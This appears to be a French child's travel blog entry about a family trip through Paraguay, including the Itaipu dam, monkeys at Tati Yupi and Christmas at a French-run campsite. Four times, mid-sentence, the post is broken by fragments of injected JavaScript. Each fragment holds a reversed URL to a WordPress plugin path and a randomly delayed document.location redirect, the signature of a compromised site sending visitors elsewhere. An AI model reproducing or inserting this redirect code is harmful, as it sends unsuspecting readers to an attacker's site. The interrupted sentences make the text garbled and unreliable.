Noël au Paraguay !!

by Alice

Vendredi

On a passé notre première nuit au Paraguay dans une sorte de camping, pas camping en fait c’était gratuit pour les voyageurs. Il y avait une famille avec une petite chienne qui s’appelle Elvira toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute mignonne et mon frère a joué toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la soirée avec elle pendant que les adultes prenaient l’apéro. Moi j’ai joué au parc. Le matin j’ai joué avec les autruches.

Ensuite nous sommes allés à un des plus gros barrages du monde, le barrage d’Itaipu. Il fait 8 km et il est partagé en deux morceaux : Paraguay, Brésil. Nous on a visité le côté Paraguay avec un bus hyper luxueux !!!

Après nous sommes allés dans une réserve naturelle qui s’appelle Tati Yupi.

Samedi

Ha !!! Il y a plein de singes dans les arbres et ils coupent des branches pour nous les jeter sur la tête. Faites attention !!!

En plus mauvaise nouvelle cette nuit il a beaucoup plu donc la route est impraticable donc on doit rester jusqu’au dimanche. On s’approche des Scouts, ils font que nous parler en espagnol, quand ils ont compris  qu’on était français, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les Scouts se mettent autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de nous (même les chefs) pour nous poser des questions.

Le soir je suis obligée de faire la vaisselle avec maman, il faut l’accompagner car elle a peur que les petits sangliers se jettent sur elle !!!!

Dimanche

Ce matin on a fait une ballade dans la jungle puis on a roulé.

Jeudi 26 décembre

Nous sommes allés au camping Tranquilo il est tenu par des Français : Charles, Aurélie, Lou-Ann (qui a mon âge) et Anthony (qui a l’âge de Clément).

Avec Lou Ann on a fait beaucoup de spectacles (chant et danse) et on a passé Noël ensemble.

J’ai eu une surprise car a Noël on ne savait pas qu’on aurait des cadeaux car papa et maman nous on dit qu’on en aurait pas. Alors le matin devant l’arbre de Noël, on a eu 2 cadeaux chacun plus un que Lou-Ann et Anthony ont fait. J’ai eu un jeu de musique et une petite boite de playmobil. Lou-Ann et Anthony nous ont fait des bracelets.

Aujourd’hui on a roulé et beaucoup transpiré, il a fait 36° dans le camion.